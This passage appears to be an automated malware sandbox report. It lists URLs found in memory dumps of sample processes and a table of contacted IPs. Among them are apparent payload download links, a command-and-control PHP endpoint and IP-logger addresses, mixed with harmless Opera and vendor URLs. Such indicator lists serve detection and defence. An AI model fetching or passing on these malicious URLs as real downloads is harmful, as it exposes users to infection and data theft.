                                                                                                                      https://namecloudvideo.org/3eef203fb515bda85f514e168abb5973.exeInstallUtil.exe, 00000008.00000002.3203681582.000000000325C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003372000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.000000000329E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003786000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003609000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.000000000355A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003776000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.000000000375B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.00000000036C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        http://185.172.128.145/3cd2b41cbde8fc9c.phpWPsyncUpd.exe, 00000011.00000002.3182663739.0000000000757000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          http://185.172.128.187/7g1UcaWDIadEWTPuXfBgjhjE.exe, 0000000F.00000002.2149316478.0000000000839000.00000004.00000020.00020000.00000000.sdmp, 7g1UcaWDIadEWTPuXfBgjhjE.exe, 0000000F.00000002.2138989621.000000000080E000.00000004.00000020.00020000.00000000.sdmp, 7g1UcaWDIadEWTPuXfBgjhjE.exe, 0000000F.00000003.2105647345.0000000000833000.00000004.00000020.00020000.00000000.sdmp, 7g1UcaWDIadEWTPuXfBgjhjE.exe, 0000000F.00000003.2105774638.0000000000837000.00000004.00000020.00020000.00000000.sdmp, 7g1UcaWDIadEWTPuXfBgjhjE.exe, 0000000F.00000003.2105647345.000000000080E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            http://15.204.49.148InstallUtil.exe, 00000008.00000002.3203681582.0000000003746000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003597000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.00000000032AC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.00000000033AB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              https://namecloudvideo.org/3eef203fb515bda85f514e168abb5973.exe4kzInstallUtil.exe, 00000008.00000002.3203681582.0000000003268000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003365000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.00000000032AC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003386000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003416000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003270000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003786000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003609000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.00000000036C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                https://shipbank.org/5150f22408eecb1d2cfd83c0e17fcd5e/3eef203fb515bda85f514e168abb5973.exeInstallUtil.exe, 00000008.00000002.3203681582.00000000032AC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.00000000032A8000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003221000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.000000000337A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  http://nsis.sf.net/NSIS_Error7g1UcaWDIadEWTPuXfBgjhjE.exe, 7g1UcaWDIadEWTPuXfBgjhjE.exe, 0000000F.00000002.2138064237.000000000040B000.00000002.00000001.01000000.00000010.sdmp, 0rb7lvvnt87bG7IAtAszCDpT.exe, 00000012.00000000.2035984505.000000000040B000.00000002.00000001.01000000.00000014.sdmp, trvViErxBCFce9vUUZnny6xg.exe, 00000017.00000000.2085317502.000000000040B000.00000002.00000001.01000000.00000018.sdmp, 363PwSZXj46RramHioCvzZ7q.exe, 00000019.00000000.2092456883.000000000040B000.00000002.00000001.01000000.0000001A.sdmp, aKsTqJOcX9LAZThGesUnxmZk.exe, 0000001B.00000002.3152845186.000000000040B000.00000002.00000001.01000000.0000001D.sdmpfalse
                                                                                                                                    http://net.geo.opera.comInstallUtil.exe, 00000008.00000002.3203681582.00000000036A0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003597000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003575000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.00000000037DA000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003386000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003609000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      http://www.google.com/feedfetcher.html)HKLM23jzBT2gZ2W4aFsNb8WtTEfu.exe, 0000002A.00000002.3216850943.0000000002E70000.00000040.00001000.00020000.00000000.sdmpfalse
                                                                                                                                        https://blockchain.infoindex23jzBT2gZ2W4aFsNb8WtTEfu.exe, 0000002A.00000002.3216850943.0000000002E70000.00000040.00001000.00020000.00000000.sdmpfalse
                                                                                                                                          https://gamemaker.io/en/get.MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3151197232.000000000084A000.00000040.00000001.01000000.00000019.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3173781304.000000000084A000.00000040.00000001.01000000.00000019.sdmpfalse
                                                                                                                                            http://namecloudvideo.orgInstallUtil.exe, 00000008.00000002.3203681582.00000000037DA000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003609000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              https://gamemaker.ioMX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3151197232.000000000084A000.00000040.00000001.01000000.00000019.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3173781304.000000000084A000.00000040.00000001.01000000.00000019.sdmpfalse
                                                                                                                                                http://185.172.128.187/ping.php?substr=seven7g1UcaWDIadEWTPuXfBgjhjE.exe, 0000000F.00000003.2105647345.000000000080E000.00000004.00000020.00020000.00000000.sdmp, 0rb7lvvnt87bG7IAtAszCDpT.exe, 00000012.00000002.3183903851.0000000002CD5000.00000004.00000020.00020000.00000000.sdmp, 0rb7lvvnt87bG7IAtAszCDpT.exe, 00000012.00000002.3181621791.000000000096E000.00000004.00000020.00020000.00000000.sdmp, trvViErxBCFce9vUUZnny6xg.exe, 00000017.00000002.3181533665.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, trvViErxBCFce9vUUZnny6xg.exe, 00000017.00000002.3194499183.0000000002C0A000.00000004.00000020.00020000.00000000.sdmp, 363PwSZXj46RramHioCvzZ7q.exe, 00000019.00000002.3184023789.0000000002CE7000.00000004.00000020.00020000.00000000.sdmp, 363PwSZXj46RramHioCvzZ7q.exe, 00000019.00000002.3181428356.00000000007DE000.00000004.00000020.00020000.00000000.sdmp, aKsTqJOcX9LAZThGesUnxmZk.exe, 0000001B.00000002.3181834392.000000000084E000.00000004.00000020.00020000.00000000.sdmp, aKsTqJOcX9LAZThGesUnxmZk.exe, 0000001B.00000002.3184608774.0000000002D55000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  http://pastebin.comInstallUtil.exe, 00000008.00000002.3203681582.0000000003597000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.00000000033B8000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.00000000034F8000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.000000000375B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    https://redir.opera.com/www.opera.com/firstrun/?utm_campaign=767&utm_medium=apb&utm_source=mkt&http_MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3240139132.0000000035440000.00000004.00001000.00020000.00000000.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000003.2613936298.000000005DF34000.00000004.00001000.00020000.00000000.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2924292015.000000005DEE0000.00000004.00001000.00020000.00000000.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2880591845.000000005DE40000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                      https://download.opera.com/download/get/?id=65171&autoupdate=1&ni=15IMX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3265307693.000000003549C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                        https://download3.operacdn.com/=MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000003.2612370535.000000000144E000.00000004.00000020.00020000.00000000.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000003.2612712820.000000000144E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          https://desktop-netinstaller-sub.osp.opera.software/r-sub.osp.opera.software/51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2631627335.0000000000BC6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            https://download3.operacdn.com/ftp/pub/opera/desktop/108.0.5067.24/win/Opera_108.0.5067.24_Autoupdat51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2631627335.0000000000C1B000.00000004.00000020.00020000.00000000.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2862191224.00000000044FE000.00000004.00000020.00020000.00000000.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2631627335.0000000000B78000.00000004.00000020.00020000.00000000.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2631627335.0000000000C4F000.00000004.00000020.00020000.00000000.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2631627335.0000000000C33000.00000004.00000020.00020000.00000000.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2854158568.00000000044F6000.00000004.00000020.00020000.00000000.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2632215104.0000000000C66000.00000004.00000020.00020000.00000000.sdmp, 1EkTthwf6man8aNjDkP3iYby.exe, 0000002B.00000003.2598618953.00000000014A1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              http://15.204.49.148/files/Silent.InstallUtil.exe, 00000008.00000002.3203681582.0000000003652000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003609000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupUInstallUtil.exe, 00000008.00000002.3203681582.00000000037E4000.00000004.00000800.00020000.00000000.sdmp, fwUkFVOLVOFs3NY104r7giRJ.exe, 0000000C.00000000.1978118196.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, DAOYzG6VUKOTbMmRBP4iG9FF.exe, 00000013.00000000.2047880300.0000000000401000.00000020.00000001.01000000.00000015.sdmpfalse
                                                                                                                                                                  https://crashpad.chromium.org/bug/newMX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3310492236.000000006BF07000.00000002.00000001.01000000.0000001B.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3151197232.0000000000875000.00000040.00000001.01000000.00000019.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3231717567.000000006B7B7000.00000002.00000001.01000000.0000001E.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3173781304.0000000000875000.00000040.00000001.01000000.00000019.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2632368764.0000000000DF5000.00000040.00000001.01000000.0000001F.sdmpfalse
                                                                                                                                                                    http://185.172.128.145/3cd2b41cbde8fc9c.phpProgramssyncUpd.exe, 00000011.00000002.3182663739.0000000000772000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      https://iplogger.org/InstallUtil.exe, 00000008.00000002.3203681582.0000000003268000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.00000000036D6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.00000000036C3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.000000000362B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.000000000352C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003799000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.00000000037A9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.000000000357B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003254000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.000000000325C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003382000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003786000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003376000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.00000000036E6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        https://download.opera.com/download/get/?id=65199&autoupdate=1&ni=1&stream=stable&utm_campaign=767&u51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2928403310.000000005DEF4000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                          https://cdn.iplogger.org/redirect/logo-dark.png);background-position:center;background-repeat:no-repInstallUtil.exe, 00000008.00000002.3203681582.00000000036C3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.000000000362B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.000000000352C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.00000000037A9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.000000000357B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003786000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.00000000036E6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            https://yip.suInstallUtil.exe, 00000008.00000002.3203681582.00000000032AC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003270000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.00000000033AE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              http://185.172.128.145/15f649199f40275b/sqlite3.dllsyncUpd.exe, 00000011.00000002.3182663739.0000000000718000.00000004.00000020.00020000.00000000.sdmp, syncUpd.exe, 00000011.00000002.3182663739.0000000000772000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                http://net.geo.operaInstallUtil.exe, 00000008.00000002.3203681582.0000000003609000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  http://15.204.498InstallUtil.exe, 00000008.00000002.3203681582.0000000003609000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    http://185.172.128InstallUtil.exe, 00000008.00000002.3203681582.00000000036F0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003609000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                                                                                                      http://net.geo.opera.com/opera/stable/windows/?utm_medium=apb&utm_source=mkt&utm_campaign=767PInstallUtil.exe, 00000008.00000002.3203681582.0000000003416000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        https://net.geo.opera.comInstallUtil.exe, 00000008.00000002.3203681582.00000000036A0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003268000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003282000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.00000000034E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          http://185.172.128.145/3cd2b41cbde8fc9c.phprowsersyncUpd.exe, 00000011.00000002.3182663739.0000000000772000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            https://vovsoft.com/newsletter/fwUkFVOLVOFs3NY104r7giRJ.exe, 0000000C.00000003.1980476061.0000000002350000.00000004.00001000.00020000.00000000.sdmp, fwUkFVOLVOFs3NY104r7giRJ.exe, 0000000C.00000003.1980573238.00000000020F4000.00000004.00001000.00020000.00000000.sdmp, fwUkFVOLVOFs3NY104r7giRJ.exe, 0000000C.00000002.3178613149.0000000002100000.00000004.00001000.00020000.00000000.sdmp, fwUkFVOLVOFs3NY104r7giRJ.tmp, 0000000E.00000003.1993807685.00000000020AC000.00000004.00001000.00020000.00000000.sdmp, fwUkFVOLVOFs3NY104r7giRJ.tmp, 0000000E.00000003.1993674545.00000000030F0000.00000004.00001000.00020000.00000000.sdmp, fwUkFVOLVOFs3NY104r7giRJ.tmp, 0000000E.00000002.3173928635.00000000020B8000.00000004.00001000.00020000.00000000.sdmp, fwUkFVOLVOFs3NY104r7giRJ.tmp, 0000000E.00000002.3173383330.000000000061A000.00000004.00000020.00020000.00000000.sdmp, DAOYzG6VUKOTbMmRBP4iG9FF.exe, 00000013.00000002.3176112237.0000000002130000.00000004.00001000.00020000.00000000.sdmp, DAOYzG6VUKOTbMmRBP4iG9FF.exe, 00000013.00000003.2051912319.0000000002360000.00000004.00001000.00020000.00000000.sdmp, DAOYzG6VUKOTbMmRBP4iG9FF.exe, 00000013.00000003.2052026418.0000000002124000.00000004.00001000.00020000.00000000.sdmp, DAOYzG6VUKOTbMmRBP4iG9FF.tmp, 00000016.00000003.2146250771.000000000213C000.00000004.00001000.00020000.00000000.sdmp, DAOYzG6VUKOTbMmRBP4iG9FF.tmp, 00000016.00000002.3180040054.0000000000858000.00000004.00000020.00020000.00000000.sdmp, DAOYzG6VUKOTbMmRBP4iG9FF.tmp, 00000016.00000002.3191413694.0000000002148000.00000004.00001000.00020000.00000000.sdmp, DAOYzG6VUKOTbMmRBP4iG9FF.tmp, 00000016.00000003.2138969685.0000000003230000.00000004.00001000.00020000.00000000.sdmp, mlSjlt4YcfcpuVp4aQsoCouK.exe, 00000022.00000003.2270698416.0000000002140000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                              http://185.172.128.145/3cd2b41cbde8fc9c.phpCPsyncUpd.exe, 00000011.00000002.3182663739.0000000000757000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                http://search.msn.com/msnbot.htm)msnbot/1.123jzBT2gZ2W4aFsNb8WtTEfu.exe, 0000002A.00000002.3216850943.0000000002E70000.00000040.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  https://yip.su/RNWPdInstallUtil.exe, 00000008.00000002.3203681582.00000000036C3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.000000000362B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.000000000352C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.00000000037A9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.000000000357B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003786000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.00000000036E6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    http://195.16.74.230/owsweblinkanalyzer.exe, 00000015.00000002.3176344487.0000000000951000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      https://vovsoft.com/contact/.fwUkFVOLVOFs3NY104r7giRJ.exe, 0000000C.00000003.1980476061.0000000002350000.00000004.00001000.00020000.00000000.sdmp, fwUkFVOLVOFs3NY104r7giRJ.exe, 0000000C.00000003.1980573238.00000000020F4000.00000004.00001000.00020000.00000000.sdmp, fwUkFVOLVOFs3NY104r7giRJ.exe, 0000000C.00000002.3178613149.0000000002100000.00000004.00001000.00020000.00000000.sdmp, fwUkFVOLVOFs3NY104r7giRJ.tmp, 0000000E.00000003.1993807685.00000000020AC000.00000004.00001000.00020000.00000000.sdmp, fwUkFVOLVOFs3NY104r7giRJ.tmp, 0000000E.00000003.1993674545.00000000030F0000.00000004.00001000.00020000.00000000.sdmp, fwUkFVOLVOFs3NY104r7giRJ.tmp, 0000000E.00000002.3173928635.00000000020B8000.00000004.00001000.00020000.00000000.sdmp, fwUkFVOLVOFs3NY104r7giRJ.tmp, 0000000E.00000002.3173383330.000000000061A000.00000004.00000020.00020000.00000000.sdmp, DAOYzG6VUKOTbMmRBP4iG9FF.exe, 00000013.00000002.3176112237.0000000002130000.00000004.00001000.00020000.00000000.sdmp, DAOYzG6VUKOTbMmRBP4iG9FF.exe, 00000013.00000003.2051912319.0000000002360000.00000004.00001000.00020000.00000000.sdmp, DAOYzG6VUKOTbMmRBP4iG9FF.exe, 00000013.00000003.2052026418.0000000002124000.00000004.00001000.00020000.00000000.sdmp, DAOYzG6VUKOTbMmRBP4iG9FF.tmp, 00000016.00000003.2146250771.000000000213C000.00000004.00001000.00020000.00000000.sdmp, DAOYzG6VUKOTbMmRBP4iG9FF.tmp, 00000016.00000002.3180040054.0000000000858000.00000004.00000020.00020000.00000000.sdmp, DAOYzG6VUKOTbMmRBP4iG9FF.tmp, 00000016.00000002.3151298469.000000000019B000.00000004.00000010.00020000.00000000.sdmp, DAOYzG6VUKOTbMmRBP4iG9FF.tmp, 00000016.00000002.3191413694.0000000002148000.00000004.00001000.00020000.00000000.sdmp, DAOYzG6VUKOTbMmRBP4iG9FF.tmp, 00000016.00000003.2138969685.0000000003230000.00000004.00001000.00020000.00000000.sdmp, mlSjlt4YcfcpuVp4aQsoCouK.exe, 00000022.00000003.2270698416.0000000002140000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        http://185.172.128.187/ping.php?substr=seven27g1UcaWDIadEWTPuXfBgjhjE.exe, 0000000F.00000002.2138989621.000000000081D000.00000004.00000020.00020000.00000000.sdmp, 7g1UcaWDIadEWTPuXfBgjhjE.exe, 0000000F.00000003.2105647345.000000000081D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          http://195.16.74.230/2weblinkanalyzer.exe, 00000015.00000002.3176344487.0000000000946000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            https://legal.opera.com/eula/computersMX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3151197232.000000000084A000.00000040.00000001.01000000.00000019.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3173781304.000000000084A000.00000040.00000001.01000000.00000019.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2632368764.0000000000DCA000.00000040.00000001.01000000.0000001F.sdmpfalse
                                                                                                                                                                                                              https://crashstats-collector.opera.com/collector/submit--annotation=channel=Stable--annotation=plat=MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3152395662.00000000004E8000.00000004.00000020.00020000.00000000.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3203950091.0000000054614000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                http://185.172.128.145/3cd2b41cbde8fc9c.phpeOperasyncUpd.exe, 00000011.00000002.3150779278.0000000000447000.00000040.00000001.01000000.00000012.sdmpfalse
                                                                                                                                                                                                                  http://midnight.bestsup.su/data/pdf/july.exeInstallUtil.exe, 00000008.00000002.3203681582.000000000325C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003372000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.000000000329E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003786000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003609000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.000000000355A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003776000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.000000000375B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.00000000036C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    http://www.remobjects.com/psUfwUkFVOLVOFs3NY104r7giRJ.exe, 0000000C.00000003.1981461612.0000000002350000.00000004.00001000.00020000.00000000.sdmp, fwUkFVOLVOFs3NY104r7giRJ.exe, 0000000C.00000003.1982439256.0000000002108000.00000004.00001000.00020000.00000000.sdmp, fwUkFVOLVOFs3NY104r7giRJ.tmp, 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, DAOYzG6VUKOTbMmRBP4iG9FF.exe, 00000013.00000003.2053165938.0000000002360000.00000004.00001000.00020000.00000000.sdmp, DAOYzG6VUKOTbMmRBP4iG9FF.exe, 00000013.00000003.2053429105.0000000002138000.00000004.00001000.00020000.00000000.sdmp, DAOYzG6VUKOTbMmRBP4iG9FF.tmp, 00000016.00000000.2084798987.0000000000401000.00000020.00000001.01000000.00000017.sdmpfalse
                                                                                                                                                                                                                      http://195.16.74.230/Aweblinkanalyzer.exe, 00000015.00000002.3176344487.0000000000946000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        https://www.opera.com..MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3310492236.000000006BF07000.00000002.00000001.01000000.0000001B.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3151197232.0000000000875000.00000040.00000001.01000000.00000019.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3231717567.000000006B7B7000.00000002.00000001.01000000.0000001E.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3173781304.0000000000875000.00000040.00000001.01000000.00000019.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2632368764.0000000000DF5000.00000040.00000001.01000000.0000001F.sdmpfalse
                                                                                                                                                                                                                          http://195.16.74.230/weblinkanalyzer.exe, 00000015.00000002.3176344487.0000000000946000.00000004.00000020.00020000.00000000.sdmp, weblinkanalyzer.exe, 00000015.00000002.3176344487.0000000000951000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            http://net.geo.opera.com/opera/stable/windows/?utm_medium=apb&utm_source=mkt&utm_campaign=InstallUtil.exe, 00000008.00000002.3203681582.0000000003597000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.00000000037DA000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003609000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              https://iplogger.com/1luzzInstallUtil.exe, 00000008.00000002.3203681582.0000000003221000.00000004.00000800.00020000.00000000.sdmpfalse

                                                                                                                                                                                                                                World Map of Contacted IPs

                                                                                                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                • 75% < No. of IPs

                                                                                                                                                                                                                                Public IPs

                                                                                                                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                93.171.243.253
                                                                                                                                                                                                                                		unknownCzech Republic
                                                                                                                                                                                                                                		8870OVDC-ASUAfalse
                                                                                                                                                                                                                                212.110.188.202
                                                                                                                                                                                                                                		unknownUnited Kingdom
                                                                                                                                                                                                                                		35425BYTEMARK-ASGBfalse
                                                                                                                                                                                                                                24.230.33.96
                                                                                                                                                                                                                                		unknownUnited States
                                                                                                                                                                                                                                		11232MIDCO-NETUSfalse
                                                                                                                                                                                                                                64.157.16.43
                                                                                                                                                                                                                                		unknownUnited States
                                                                                                                                                                                                                                		3064AFFINITY-FTLUSfalse
